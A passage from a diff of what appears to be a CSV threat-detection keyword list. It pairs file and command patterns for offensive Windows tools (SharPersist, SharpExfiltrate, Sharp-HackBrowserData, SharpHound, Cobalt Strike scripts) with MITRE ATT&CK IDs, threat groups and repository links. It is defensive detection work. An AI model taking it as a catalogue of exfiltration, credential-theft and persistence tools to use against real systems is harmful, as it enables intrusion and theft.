Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" -"*SharPersist*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*SharPersist.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharPersist*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*SharPersist.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpEventLoader*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEvtMute.cs*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" @@ -16593,7 +16776,7 @@ "*SharpEvtMute.sln*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpExcelibur*","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","10","10","85","19","2021-07-20T04:56:55Z","2021-07-16T19:48:45Z" "*sharp-exec *","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" -"*SharpExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpExfiltrate.csproj*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.sln*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" @@ -16608,101 +16791,101 @@ "*SharpGmailC2-main*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" -"*SharpGPOAbuse.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpGPOAbuse.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpGPOAddComputer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddLocalAdmin*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddUser*Manager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Sharp-HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" -"*Sharp-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" -"*SharpHandler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Sharp-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*SharpHandler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpHide.csproj*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.exe*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.sln*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide-master*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*SharpHose.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharphound -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpHound-*.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*sharphound*--stealth*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*sharphound.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHose.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharphound -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpHound-*.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharphound*--stealth*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharphound.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*SharpHound.cna*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*SharpHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*SharpHound.exe*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 